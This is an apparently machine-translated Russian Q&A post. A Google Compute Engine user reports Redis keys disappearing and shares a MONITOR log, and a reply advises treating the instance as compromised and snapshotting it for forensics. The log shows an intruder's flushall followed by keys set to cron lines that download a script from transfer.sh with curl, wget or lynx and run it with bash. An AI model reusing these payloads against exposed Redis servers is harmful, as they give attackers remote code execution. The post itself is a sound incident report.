Google Cloud Compute Engine: автоматическое удаление ключей.

Question

Привет странная проблема происходит. У меня есть экземпляр облака Google, в котором выполняется Redis 4. Проблема заключается в автоматическом удалении данных / ключа Redis после вставки в течение нескольких часов или минут.

Когда я использую redis-cli с командой MONITOR, я обнаружил следующее:

1525399477.663192 [0 122.114.179.53:47936] "информация"

1525399487.102961 [0 122.114.179.53:55176] "КОМАНДА"

1525399487.546006 [0 122.114.179.53:55176] "flushall"

1525399488.214514 [0 122.114.179.53:55176] "set" "Backup1" "\ t \ n * / 2 * * * * curl -s https://transfer.sh/mQnwD/tmp.CG62KOYFtW> .cmd && bash .cmd \ n \ t «

1525399488.435296 [0 122.114.179.53:55176] "set" "Backup2" "\ t \ n * / 5 * * * * wget -O .cmd https://transfer.sh/mQnwD/tmp.CG62KOYFtW && bash .cmd \ n \ t"

1525399488.661485 [0 122.114.179.53:55176] "set" "Backup3" "\ t \ n * / 10 * * * * lynx -source https://transfer.sh/mQnwD /tmp.CG62KOYFtW> .cmd && bash .cmd \ n \ t "

Понятия не имею об этом IP-адресе: 122.114.179.53

Спасибо

Answer 1

Кажется, что ваш экземпляр Google Compute Engine был взломан.

Я настоятельно рекомендую вам остановить его, сделать снимок диска и создать новые экземпляры с моментальным снимком поврежденного экземпляра в качестве дополнительного диска для проведения судебного анализа.